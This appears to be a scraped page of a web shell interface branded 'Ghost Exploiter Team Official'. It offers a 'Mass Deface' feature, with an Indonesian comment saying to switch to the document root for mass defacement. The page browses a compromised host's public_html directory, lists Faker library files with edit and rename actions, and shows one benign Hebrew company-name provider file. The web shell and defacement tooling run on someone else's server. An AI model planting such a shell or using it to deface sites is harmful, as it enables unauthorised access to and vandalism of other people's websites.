webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
fakerphp
/
faker
/
src
/
Faker
/
Provider
/
he_IL
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
Address.php
24.731KB
edt
ren
Company.php
0.367KB
edt
ren
Payment.php
0.666KB
edt
ren
Person.php
27.791KB
edt
ren
PhoneNumber.php
0.252KB
edt
ren
<?php namespace Faker\Provider\he_IL; class Company extends \Faker\Provider\Company { protected static $formats = [ '{{lastName}} {{companySuffix}}', '{{lastName}} את {{lastName}} {{companySuffix}}', '{{lastName}} ו{{lastName}}', ]; protected static $companySuffix = ['בע"מ', 'ובניו', 'סוכנויות', 'משווקים']; }